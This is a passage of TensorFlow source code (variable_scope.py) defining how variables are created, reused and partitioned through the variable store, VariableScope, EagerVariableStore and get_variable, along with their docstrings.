# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(
1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
